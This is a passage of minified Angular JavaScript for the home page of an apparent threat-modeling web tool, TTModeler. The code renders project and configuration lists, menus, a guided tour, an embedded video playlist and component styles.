_ct(t,a){if(1&t){const e=Ye();m(0,"mat-paginator",54),he("page",function(n){return be(e),Me(V(2).pageFSProjectIndex=n.pageIndex)}),s(1," "),u()}if(2&t){const e=V(2);F("length",e.dataService.AvailableFSProjects.length)("pageSize",e.pageProjectSize)("hidePageSize",!0)}}function gct(t,a){1&t&&(m(0,"mat-icon",53),oe(1,"translate"),s(2,"edit_off"),u()),2&t&&at("matTooltip",re(1,1,"pages.home.notWritable"))}function Cct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"div",56),s(3,"\n "),m(4,"mat-icon",48),oe(5,"translate"),s(6,"cloud_queue"),u(),s(7,"\n "),m(8,"button",40),he("click",function(){const r=be(e).$implicit;return Me(V(2).dataService.OnLoadFile(r))}),s(9),u(),s(10,"\n "),m(11,"span",57),s(12),u(),s(13,"\n "),ne(14,gct,3,3,"mat-icon",50),s(15,"\n "),m(16,"button",51),oe(17,"translate"),s(18,"\n "),m(19,"mat-icon"),s(20,"more_vert"),u(),s(21,"\n "),u(),s(22,"\n "),m(23,"mat-menu",null,58),s(25,"\n "),m(26,"button",24),he("click",function(){const r=be(e).$implicit;return Me(V(2).dataService.OpenRepo(r))}),s(27,"\n "),m(28,"mat-icon"),s(29,"open_in_new"),u(),s(30,"\n "),m(31,"span"),s(32),oe(33,"translate"),u(),s(34,"\n "),u(),s(35,"\n "),m(36,"button",24),he("click",function(){const r=be(e).$implicit;return Me(V(2).dataService.DeleteFile(r))}),s(37,"\n "),m(38,"mat-icon"),s(39,"delete"),u(),s(40,"\n "),m(41,"span"),s(42),oe(43,"translate"),u(),s(44,"\n "),u(),s(45,"\n "),u(),s(46,"\n "),u(),s(47,"\n "),Mt()}if(2&t){const e=a.$implicit,i=Ti(24),n=V(2);g(4),at("matTooltip",re(5,8,"pages.home.storedOnline")),g(5),ke(e.name),g(3),ct("in ",n.GetRepoName(e),""),g(2),F("ngIf",n.IsProtected(e)),g(2),at("matTooltip",re(17,10,"general.More")),F("matMenuTriggerFor",i),g(16),ke(re(33,12,"general.openInNew")),g(10),ke(re(43,14,"general.Delete"))}}function yct(t,a){if(1&t){const e=Ye();m(0,"mat-paginator",54),he("page",function(n){return be(e),Me(V(2).pageGHConfigIndex=n.pageIndex)}),s(1," "),u()}if(2&t){const e=V(2);F("length",e.dataService.AvailableGHConfigs.length)("pageSize",e.pageConfigSize)("hidePageSize",!0)}}function bct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"div",56),s(3,"\n "),m(4,"mat-icon",48),oe(5,"translate"),s(6,"file_present"),u(),s(7,"\n "),m(8,"button",40),he("click",function(){const r=be(e).$implicit;return Me(V(2).dataService.OnLoadFile(r))}),s(9),u(),s(10,"\n "),m(11,"span",49),s(12),u(),s(13,"\n "),m(14,"button",51),oe(15,"translate"),s(16,"\n "),m(17,"mat-icon"),s(18,"more_vert"),u(),s(19,"\n "),u(),s(20,"\n "),m(21,"mat-menu",null,59),s(23,"\n "),m(24,"button",24),he("click",function(){const r=be(e).$implicit;return Me(V(2).dataService.RemoveFSFile(r))}),s(25,"\n "),m(26,"mat-icon"),s(27,"remove"),u(),s(28,"\n "),m(29,"span"),s(30),oe(31,"translate"),u(),s(32,"\n "),u(),s(33,"\n "),m(34,"button",24),he("click",function(){const r=be(e).$implicit;return Me(V(2).dataService.DeleteFile(r))}),s(35,"\n "),m(36,"mat-icon"),s(37,"delete"),u(),s(38,"\n "),m(39,"span"),s(40),oe(41,"translate"),u(),s(42,"\n "),u(),s(43,"\n "),u(),s(44,"\n "),u(),s(45,"\n "),Mt()}if(2&t){const e=a.$implicit,i=Ti(22),n=V(2);g(4),at("matTooltip",re(5,8,"pages.home.storedOffline")),g(5),ke(n.dataService.GetFileName(e.path)),g(2),at("matTooltip",n.dataService.GetFilePath(e.path)),g(1),ct("in ",n.CutName(n.dataService.GetFilePath(e.path)),""),g(2),at("matTooltip",re(15,10,"general.More")),F("matMenuTriggerFor",i),g(16),ke(re(31,12,"general.Remove")),g(10),ke(re(41,14,"general.Delete"))}}function Mct(t,a){if(1&t){const e=Ye();m(0,"mat-paginator",54),he("page",function(n){return be(e),Me(V(2).pageFSConfigIndex=n.pageIndex)}),s(1," "),u()}if(2&t){const e=V(2);F("length",e.dataService.AvailableFSConfigs.length)("pageSize",e.pageConfigSize)("hidePageSize",!0)}}function vct(t,a){1&t&&(bt(0),s(1,"\n "),it(2,"br"),s(3,"\n "),m(4,"mat-icon",60),s(5,"install_desktop"),u(),s(6,"\n "),m(7,"a",61),s(8),oe(9,"translate"),u(),s(10,"\n "),Mt()),2&t&&(g(8),ke(re(9,1,"pages.home.downloadDesktop")))}function Act(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"h2"),s(3),oe(4,"translate"),m(5,"button",16),s(6,"\n "),m(7,"mat-icon"),s(8,"more_vert"),u(),s(9,"\n "),u(),s(10,"\n "),m(11,"mat-menu",null,17),s(13,"\n "),m(14,"button",18),he("click",function(){return be(e),Me(V().dataService.OnSave())}),s(15,"\n "),m(16,"mat-icon"),s(17,"save"),u(),s(18,"\n "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n "),u(),s(23,"\n "),m(24,"button",19),he("click",function(){return be(e),Me(V().dataService.OnSave(!1,!0))}),oe(25,"translate"),s(26,"\n "),m(27,"mat-icon"),s(28,"file_download"),u(),s(29,"\n "),m(30,"span"),s(31),oe(32,"translate"),u(),s(33,"\n "),u(),s(34,"\n "),m(35,"button",20),he("click",function(){return be(e),Me(V().dataService.OnSave(!1,!0,!0))}),oe(36,"translate"),s(37,"\n "),m(38,"mat-icon"),s(39,"file_download"),u(),s(40,"\n "),m(41,"span"),s(42),oe(43,"translate"),u(),s(44,"\n "),u(),s(45,"\n "),m(46,"button",19),he("click",function(){return be(e),Me(V().dataService.OnSave(!0,!1,!0))}),oe(47,"translate"),s(48,"\n "),m(49,"mat-icon"),s(50,"output"),u(),s(51,"\n "),m(52,"span"),s(53),oe(54,"translate"),u(),s(55,"\n "),u(),s(56,"\n "),m(57,"button",21),oe(58,"translate"),s(59,"\n "),m(60,"mat-icon"),s(61,"wifi_protected_setup"),u(),s(62,"\n "),m(63,"span"),s(64),oe(65,"translate"),u(),s(66,"\n "),u(),s(67,"\n "),m(68,"mat-menu",null,22),s(70,"\n "),m(71,"button",23),s(72,"\n "),m(73,"mat-icon"),s(74,"file_upload"),u(),s(75),oe(76,"translate"),u(),s(77,"\n "),m(78,"button",24),he("click",function(){return be(e),Me(V().dataService.ExchangeConfigWithDefault())}),s(79),oe(80,"translate"),u(),s(81,"\n "),ne(82,sct,2,1,"button",25),s(83,"\n "),u(),s(84,"\n "),m(85,"button",19),he("click",function(){return be(e),Me(V().dataService.OnTransferProjectDetails())}),oe(86,"translate"),s(87,"\n "),m(88,"mat-icon"),s(89,"exit_to_app"),u(),s(90,"\n "),m(91,"span"),s(92),oe(93,"translate"),u(),s(94,"\n "),u(),s(95,"\n "),m(96,"button",18),he("click",function(){return be(e),Me(V().dataService.OnCloseFile())}),s(97,"\n "),m(98,"mat-icon"),s(99,"close"),u(),s(100,"\n "),m(101,"span"),s(102),oe(103,"translate"),u(),s(104,"\n "),u(),s(105,"\n "),it(106,"mat-divider"),s(107,"\n "),m(108,"input",26,27),he("change",function(n){return be(e),Me(V().dataService.ImportFile(n))}),u(),s(110,"\n "),m(111,"button",28),he("click",function(){return be(e),Me(Ti(109).click())}),oe(112,"translate"),s(113,"\n "),m(114,"mat-icon"),s(115,"file_upload"),u(),s(116,"\n "),m(117,"span"),s(118),oe(119,"translate"),u(),s(120,"\n "),u(),s(121,"\n "),u(),s(122,"\n "),u(),s(123,"\n\n "),ne(124,cct,5,4,"div",29),s(125,"\n\n "),ne(126,lct,6,3,"button",30),s(127,"\n "),ne(128,dct,6,4,"button",31),s(129,"\n "),m(130,"mat-menu",null,32),s(132,"\n "),m(133,"button",24),he("click",function(){return be(e),Me(V().dataService.OnNewProject())}),s(134,"\n "),m(135,"mat-icon"),s(136,"book_2"),u(),s(137,"\n "),m(138,"span"),s(139),oe(140,"translate"),u(),s(141,"\n "),u(),s(142,"\n "),ne(143,mct,8,2,"button",25),s(144,"\n "),u(),s(145,"\n "),it(146,"br"),s(147,"\n "),ne(148,hct,48,17,"ng-container",33),s(149,"\n "),ne(150,fct,2,3,"mat-paginator",34),s(151,"\n \n "),ne(152,pct,46,16,"ng-container",33),s(153,"\n "),ne(154,_ct,2,3,"mat-paginator",34),s(155,"\n\n "),m(156,"h2"),s(157),oe(158,"translate"),m(159,"button",16),s(160,"\n "),m(161,"mat-icon"),s(162,"more_vert"),u(),s(163,"\n "),u(),s(164,"\n "),m(165,"mat-menu",null,35),s(167,"\n "),m(168,"input",36,37),he("change",function(n){return be(e),Me(V().dataService.ImportFile(n))}),u(),s(170,"\n "),m(171,"button",24),he("click",function(){return be(e),Me(Ti(169).click())}),s(172,"\n "),m(173,"mat-icon"),s(174,"file_upload"),u(),s(175,"\n "),m(176,"span"),s(177),oe(178,"translate"),u(),s(179,"\n "),u(),s(180,"\n "),u(),s(181,"\n "),u(),s(182,"\n\n "),ne(183,Cct,48,16,"ng-container",33),s(184,"\n "),ne(185,yct,2,3,"mat-paginator",34),s(186,"\n\n "),ne(187,bct,46,16,"ng-container",33),s(188,"\n "),ne(189,Mct,2,3,"mat-paginator",34),s(190,"\n\n "),m(191,"div",38),s(192,"\n "),m(193,"mat-icon",39),s(194,"waving_hand"),u(),s(195,"\n "),m(196,"button",40),he("click",function(){return be(e),Me(V().tourService.start())}),s(197),oe(198,"translate"),u(),s(199,"\n "),ne(200,vct,11,3,"ng-container",9),s(201,"\n "),it(202,"br"),s(203,"\n "),m(204,"mat-icon",41),s(205,"code"),u(),s(206,"\n "),m(207,"a",42),s(208),oe(209,"translate"),u(),s(210,"\n "),u(),s(211,"\n "),Mt()}if(2&t){const e=Ti(12),i=Ti(69),n=Ti(166),r=V();g(3),ct("\n ",re(4,47,"pages.home.projects"),"\n "),g(2),F("matMenuTriggerFor",e),g(9),F("disabled",!r.dataService.CanSaveProject),g(6),ke(re(21,49,"pages.home.menu.saveProject")),g(4),at("matTooltip",re(25,51,"pages.home.menu.downloadProject.tt")),F("disabled",!r.dataService.Project),g(7),ke(re(32,53,"pages.home.menu.downloadProject")),g(4),at("matTooltip",re(36,55,"pages.home.menu.downloadConfig.tt")),F("disabled",!r.dataService.Project),g(7),ke(re(43,57,"pages.home.menu.downloadConfig")),g(4),at("matTooltip",re(47,59,"pages.home.menu.exportConfig.tt")),F("disabled",!r.dataService.Project||!r.dataService.IsLoggedIn),g(7),ke(re(54,61,"pages.home.menu.exportConfig")),g(4),at("matTooltip",re(58,63,"pages.home.menu.exchangeConfig.tt")),F("disabled",!r.dataService.Project)("matMenuTriggerFor",i),g(7),ke(re(65,65,"pages.home.menu.exchangeConfig")),g(7),F("disabled",!0),g(4),ct("\n ",re(76,67,"pages.home.menu.importConfig"),"\n "),g(4),ke(re(80,69,"general.DefaultConfiguration")),g(3),F("ngForOf",r.dataService.AvailableGHConfigs),g(3),at("matTooltip",re(86,71,"pages.home.menu.transferProjectDetails.tt")),F("disabled",!r.dataService.HasProject),g(7),ke(re(93,73,"pages.home.menu.transferProjectDetails")),g(4),F("disabled",!r.dataService.Project),g(6),ke(re(103,75,"pages.home.menu.closeProject")),g(9),at("matTooltip",re(112,77,"pages.home.menu.importProject.tt")),g(7),ke(re(119,79,"pages.home.menu.importProject")),g(6),F("ngIf",r.dataService.HasProject),g(2),F("ngIf",0==r.dataService.AvailableConfigs.length),g(2),F("ngIf",r.dataService.AvailableConfigs.length>0),g(11),ke(re(140,81,"general.DefaultConfiguration")),g(4),F("ngForOf",r.dataService.AvailableConfigs),g(5),F("ngForOf",r.GetAvailableGHProjects()),g(2),F("ngIf",r.dataService.AvailableGHProjects.length>0),g(2),F("ngForOf",r.GetAvailableFSProjects()),g(2),F("ngIf",r.dataService.AvailableFSProjects.length>0),g(3),ct("\n ",re(158,83,"pages.home.configs"),"\n "),g(2),F("matMenuTriggerFor",n),g(18),ke(re(178,85,"pages.home.menu.importConfig")),g(6),F("ngForOf",r.GetAvailableGHConfigs()),g(2),F("ngIf",r.dataService.AvailableGHConfigs.length>0),g(2),F("ngForOf",r.GetAvailableFSConfigs()),g(2),F("ngIf",r.dataService.AvailableFSConfigs.length>0),g(8),ke(re(198,87,"pages.home.welcomeTour")),g(3),F("ngIf",!(null!=r.electron&&r.electron.isElectron)),g(8),ke(re(209,89,"pages.home.viewSourceCode"))}}function Tct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"h2"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"p"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"button",62),s(11),oe(12,"translate"),u(),s(13,"\n "),m(14,"button",63),he("click",function(){be(e);const n=V();return n.dataService.GuestLogin(),Me(n.CheckTourStart())}),s(15),oe(16,"translate"),u(),s(17,"\n "),Mt()}2&t&&(g(3),ct("",re(4,4,"pages.home.welcome"),"!"),g(4),ct("",re(8,6,"pages.home.need_login"),":"),g(4),ke(re(12,8,"pages.home.go_to_login")),g(4),ke(re(16,10,"pages.login.loginAsGuest")))}function Ect(t,a){1&t&&(bt(0),s(1,"\n "),m(2,"div",43),s(3),oe(4,"translate"),m(5,"a",64),s(6,"YouTube"),u(),s(7,"\n "),it(8,"br"),s(9,"\n "),u(),s(10,"\n "),Mt()),2&t&&(g(3),ct("\n ",re(4,1,"pages.home.video"),": "))}function Dct(t,a){if(1&t&&(bt(0),s(1,"\n "),m(2,"div",65),s(3,"\n "),it(4,"iframe",66),s(5,"\n "),u(),s(6,"\n "),Mt()),2&t){const e=V();g(4),F("src",e.VideoURL,PC)}}function xct(t,a){if(1&t&&(m(0,"p",67)(1,"mat-icon",68),s(2,"done"),u(),s(3),oe(4,"translate"),u()),2&t){const e=a.$implicit;g(3),ct(" ",re(4,1,"pages.home.tool."+e),"")}}function wct(t,a){if(1&t&&(m(0,"p"),s(1),u()),2&t){const e=a.$implicit;g(1),za("",e.number,". ",e.name,"")}}function Ict(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(V(2).NextProcessStep())}),s(1),oe(2,"translate"),u()}2&t&&(g(1),ke(re(2,1,"tour.next")))}function Rct(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(V(2).ProgressTracker())}),s(1),oe(2,"translate"),u()}2&t&&(g(1),ke(re(2,1,"tour.progressTracker")))}function Sct(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(V(2).NextProcessStep())}),s(1),oe(2,"translate"),u()}2&t&&(g(1),ke(re(2,1,"tour.end")))}function kct(t,a){if(1&t){const e=Ye();m(0,"mat-expansion-panel",12),he("opened",function(){const r=be(e).index;return Me(V().SetProcessStep(r+2))}),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5),u(),s(6,"\n "),m(7,"mat-panel-description"),s(8),m(9,"mat-icon"),s(10),u(),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n\n "),ne(14,wct,2,2,"p",33),s(15,"\n "),m(16,"mat-action-row"),s(17,"\n "),m(18,"button",14),he("click",function(){return be(e),Me(V().PrevProcessStep())}),s(19),oe(20,"translate"),u(),s(21,"\n "),ne(22,Ict,3,3,"button",69),s(23,"\n "),ne(24,Rct,3,3,"button",69),s(25,"\n "),ne(26,Sct,3,3,"button",69),s(27,"\n "),u(),s(28,"\n "),u()}if(2&t){const e=a.$implicit,i=a.index,n=a.last,r=V();ri("margin-bottom",n?"20px":"0px"),F("expanded",r.processStep===i+2),g(5),ct("\n ",e.name,"\n "),g(3),ct("\n ",e.desc,"\n "),g(2),ke(e.icon),g(4),F("ngForOf",e.steps),g(5),ke(re(20,11,"tour.prev")),g(3),F("ngIf",!n),g(2),F("ngIf",n),g(2),F("ngIf",n)}}const Pct=[{path:"home",component:(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe){this.router=e,this.route=i,this.theme=n,this.dataService=r,this.dialogService=c,this.dialog=d,this.locStorage=T,this.tourService=k,this.translate=q,this.electron=Y,this.ttmService=te,this.sanitizer=pe,this.processStep=null,this.VideoURL=null,this.pageProjectSize=5,this.pageConfigSize=5,this.pageGHProjectIndex=0,this.pageGHConfigIndex=0,this.pageFSProjectIndex=0,this.pageFSConfigIndex=0,this.toolBenefits=["platform","onlineStorage","offlineStorage","libraries","libraryIntegration","guidelines","diagramming","riskAssessment","dashboard","reports","export","languages","collaboration"],this.VideoURL=this.sanitizer.bypassSecurityTrustResourceUrl("https://www.youtube-nocookie.com/embed/videoseries?list=PLSMRtuVN409fB35RLljjg3jNkVJbLIP1u")}get Stages(){return this.ttmService.Stages}get HasCookieConsent(){let e=this.locStorage.Get(si.COOKIE_CONSENT);return null!=e&&JSON.parse(e)}ngOnInit(){const e=n=>({anchorId:n,content:this.translate.instant("tour."+n+".content"),title:this.translate.instant("tour."+n+".title"),route:"",enableBackdrop:!0,prevBtnTitle:this.translate.instant("tour.prev"),nextBtnTitle:this.translate.instant("tour.next"),endBtnTitle:this.translate.instant("tour.end")});this.translate.get("tour.change-settings.title").subscribe(()=>{const n=()=>{this.tourService.initialize([e("change-settings"),e("message-history"),e("save-file"),e("set-progress")]),null==this.locStorage.Get(si.COOKIE_CONSENT)?this.dialogService.OpenCookieConsentDialog().subscribe(d=>this.CheckTourStart()):this.CheckTourStart()},r=this.locStorage.Get(si.LANGUAGE);r&&0!=r.length?n():this.dialog.open(rct).afterClosed().subscribe(c=>{n()})});let i="modeling";this.route.queryParams.subscribe(n=>{null!=n.origin&&(i=n.origin)}),this.dataService.ProjectChanged.subscribe(n=>{null!=n&&this.router.navigate(["/"+i])})}CheckTourStart(){[Wr.LoggedIn,Wr.Guest].includes(this.dataService.UserMode)&&(this.locStorage.Get(si.WELCOME_TOUR_STARTED)||(this.tourService.start(),this.locStorage.Set(si.WELCOME_TOUR_STARTED,JSON.stringify(!0))))}GetRepoName(e){var i;return null===(i=this.dataService.GetRepoOfFile(e))||void 0===i?void 0:i.name}IsProtected(e){var i;return!(null!==(i=this.dataService.GetRepoOfFile(e))&&void 0!==i&&i.isWritable)}GetAvailableGHProjects(){return this.dataService.AvailableGHProjects.slice(this.pageGHProjectIndex*this.pageProjectSize,(this.pageGHProjectIndex+1)*this.pageProjectSize)}GetAvailableGHConfigs(){return this.dataService.AvailableGHConfigs.slice(this.pageGHConfigIndex*this.pageConfigSize,(this.pageGHConfigIndex+1)*this.pageConfigSize)}GetAvailableFSProjects(){return this.dataService.AvailableFSProjects.slice(this.pageFSProjectIndex*this.pageProjectSize,(this.pageFSProjectIndex+1)*this.pageProjectSize)}GetAvailableFSConfigs(){return this.dataService.AvailableFSConfigs.slice(this.pageFSConfigIndex*this.pageConfigSize,(this.pageFSConfigIndex+1)*this.pageConfigSize)}SetProcessStep(e){this.processStep=e}NextProcessStep(){this.processStep++}PrevProcessStep(){this.processStep--}ProgressTracker(){this.NextProcessStep(),this.dialogService.OpenProgresstrackerDialog()}GetFileIcon(e){return e.source==hn.FileSystem?"file_present":"cloud_queue"}CutName(e){return e&&e.length>35?"[...]"+e.substring(e.length-30):e}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oo),Ee(Tl),Ee(Oa),Ee(Yi),Ee(Wn),Ee(vu),Ee(_r),Ee(Gb),Ee(Sn),Ee(ST),Ee(x5),Ee(cy))},t.\u0275cmp=Wt({type:t,selectors:[["app-home"]],decls:117,vars:38,consts:[["color","primary",1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/home",2,"width","100%","height","100%"],[1,"title"],["src","./assets/icons/favicon.192x192.png?raw=true","alt","logo",2,"width","50px"],[1,"row"],[1,"column"],[1,"first-column-content"],[4,"ngIf"],[1,"second-column-content"],[1,"expansion-panel-headers-align"],["hideToggle","",3,"expanded","opened"],["style","margin: 0;",4,"ngFor","ngForOf"],["mat-button","","color","primary",3,"click"],["hideToggle","",3,"marginBottom","expanded","opened",4,"ngFor","ngForOf"],["mat-icon-button","","aria-label","Menu",2,"vertical-align","middle",3,"matMenuTriggerFor"],["projMenu","matMenu"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","","matTooltipShowDelay","1000",3,"disabled","matTooltip","click"],["mat-menu-item","","matTooltipShowDelay","1000",1,"exportBtn",3,"disabled","matTooltip","click"],["mat-menu-item","","matTooltipShowDelay","1000",1,"exportBtn",3,"disabled","matMenuTriggerFor","matTooltip"],["exchangeMenu","matMenu"],["mat-menu-item","",3,"disabled"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["hidden","","type","file","accept",".ttmp",3,"change"],["projectUploader",""],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click"],["style","margin-bottom: 10px;",4,"ngIf"],["mat-button","","style","padding-left: 0px; margin-bottom: 20px;",3,"click",4,"ngIf"],["mat-button","","style","padding-left: 0px; margin-bottom: 20px;",3,"matMenuTriggerFor",4,"ngIf"],["createProjectWithConfig","matMenu"],[4,"ngFor","ngForOf"],["class","paginator",3,"length","pageSize","hidePageSize","page",4,"ngIf"],["confMenu","matMenu"],["hidden","","type","file","accept",".ttmc",3,"change"],["configUploader",""],[2,"margin-top","50px"],[1,"iconBtn",2,"vertical-align","top","font-size","20px","margin-right","5px"],[1,"color-primary","astext",3,"click"],[1,"iconBtn",2,"vertical-align","top","font-size","20px","margin-right","5px","margin-bottom","10px"],["href","https://github.com/SecSimon/TTM","target","_blank"],[2,"margin-bottom","10px"],["mat-button","",2,"padding-left","0px","margin-bottom","20px",3,"click"],["color","primary"],["mat-button","",2,"padding-left","0px","margin-bottom","20px",3,"matMenuTriggerFor"],["id","project"],["matTooltipShowDelay","1000",1,"iconBtn",2,"vertical-align","top","font-size","20px","margin-right","5px",3,"matTooltip"],["matTooltipShowDelay","1000",2,"font-size","small","margin-left","5px",3,"matTooltip"],["class","iconBtn","style","vertical-align: top; margin-right: 5px;","matTooltipShowDelay","1000",3,"matTooltip",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",1,"show-on-hover","iconBtn",2,"margin-right","5px",3,"matMenuTriggerFor","matTooltip"],["moreGHProject","matMenu"],["matTooltipShowDelay","1000",1,"iconBtn",2,"vertical-align","top","margin-right","5px",3,"matTooltip"],[1,"paginator",3,"length","pageSize","hidePageSize","page"],["moreFSProject","matMenu"],["id","config"],[2,"font-size","small","margin-left","5px"],["moreGHConfig","matMenu"],["moreFSConfig","matMenu"],[1,"iconBtn",2,"vertical-align","top","font-size","20px","margin-right","5px","margin-bottom","5px"],["href","https://github.com/SecSimon/TTM/releases","target","_blank"],["mat-button","","routerLink","/login"],["mat-button","",3,"click"],["href","https://youtube.com/playlist?list=PLSMRtuVN409fB35RLljjg3jNkVJbLIP1u","target","_blank"],[1,"videoContainer"],["title","Thing Threat Modeling","frameborder","0","allow","accelerometer; encrypted-media; gyroscope; picture-in-picture","allowfullscreen","",1,"video",3,"src"],[2,"margin","0"],[2,"vertical-align","bottom"],["mat-button","","color","primary",3,"click",4,"ngIf"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n "),m(2,"mat-drawer-container",1),s(3,"\n "),m(4,"mat-drawer",2),s(5,"\n "),it(6,"app-side-nav",3),s(7,"\n "),u(),s(8,"\n\n "),m(9,"mat-drawer-content"),s(10,"\n "),m(11,"div",4),s(12,"\n "),m(13,"h1"),it(14,"img",5),s(15),oe(16,"translate"),u(),s(17,"\n "),m(18,"h3"),s(19),oe(20,"translate"),u(),s(21,"\n "),u(),s(22,"\n "),m(23,"div",6),s(24,"\n "),m(25,"div",7),s(26,"\n "),m(27,"div",8),s(28,"\n "),ne(29,Act,212,91,"ng-container",9),s(30,"\n\n "),ne(31,Tct,18,12,"ng-container",9),s(32,"\n "),u(),s(33,"\n "),u(),s(34,"\n "),m(35,"div",7),s(36,"\n "),m(37,"div",10),s(38,"\n "),m(39,"h2"),s(40),oe(41,"translate"),u(),s(42,"\n "),ne(43,Ect,11,3,"ng-container",9),s(44,"\n "),ne(45,Dct,7,1,"ng-container",9),s(46,"\n "),m(47,"mat-accordion",11),s(48,"\n "),m(49,"mat-expansion-panel",12),he("opened",function(){return i.SetProcessStep(0)}),s(50,"\n "),m(51,"mat-expansion-panel-header"),s(52,"\n "),m(53,"mat-panel-title"),s(54,"\n TTModeler\n "),u(),s(55,"\n "),m(56,"mat-panel-description"),s(57),oe(58,"translate"),m(59,"mat-icon"),s(60,"terminal"),u(),s(61,"\n "),u(),s(62,"\n "),u(),s(63,"\n\n "),ne(64,xct,5,3,"p",13),s(65,"\n "),m(66,"mat-action-row"),s(67,"\n "),m(68,"button",14),he("click",function(){return i.NextProcessStep()}),s(69),oe(70,"translate"),u(),s(71,"\n "),u(),s(72,"\n "),u(),s(73,"\n "),m(74,"mat-expansion-panel",12),he("opened",function(){return i.SetProcessStep(1)}),s(75,"\n "),m(76,"mat-expansion-panel-header"),s(77,"\n "),m(78,"mat-panel-title"),s(79),oe(80,"translate"),u(),s(81,"\n "),m(82,"mat-panel-description"),s(83),oe(84,"translate"),m(85,"mat-icon"),s(86,"star"),u(),s(87,"\n "),u(),s(88,"\n "),u(),s(89,"\n\n "),m(90,"p"),s(91),oe(92,"translate"),u(),s(93,"\n "),m(94,"mat-action-row"),s(95,"\n "),m(96,"button",14),he("click",function(){return i.PrevProcessStep()}),s(97),oe(98,"translate"),u(),s(99,"\n "),m(100,"button",14),he("click",function(){return i.NextProcessStep()}),s(101),oe(102,"translate"),u(),s(103,"\n "),u(),s(104,"\n "),u(),s(105,"\n "),ne(106,kct,29,13,"mat-expansion-panel",15),s(107,"\n "),u(),s(108,"\n "),u(),s(109,"\n "),u(),s(110,"\n "),u(),s(111,"\n "),u(),s(112,"\n "),u(),s(113,"\n "),it(114,"app-status-bar"),s(115,"\n"),u(),s(116,"\n")),2&e&&(g(15),ct(" ",re(16,18,"pages.home.title"),""),g(4),ke(re(20,20,"pages.home.subtitle")),g(10),F("ngIf",i.dataService.IsLoggedIn||i.dataService.IsGuest),g(2),F("ngIf",!i.dataService.IsLoggedIn&&!i.dataService.IsGuest),g(9),ke(re(41,22,"pages.home.process")),g(3),F("ngIf",!i.HasCookieConsent),g(2),F("ngIf",i.HasCookieConsent),g(4),F("expanded",0===i.processStep),g(8),ct("\n ",re(58,24,"pages.home.tool"),"\n "),g(7),F("ngForOf",i.toolBenefits),g(5),ke(re(70,26,"tour.next")),g(5),F("expanded",1===i.processStep),g(5),ct("\n ",re(80,28,"pages.home.process"),"\n "),g(4),ct("\n ",re(84,30,"pages.home.methodology"),"\n "),g(8),ke(re(92,32,"pages.home.methodologyInfo")),g(6),ke(re(98,34,"tour.prev")),g(4),ke(re(102,36,"tour.next")),g(5),F("ngForOf",i.Stages))},dependencies:[Zi,Ri,oa,_u,gu,Nd,da,pp,Xo,qo,po,Pa,il,Ec,E8,Dc,tl,wl,x8,pf,_f,x1,Xi],styles:['.primary-color[_ngcontent-%COMP%], a[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] 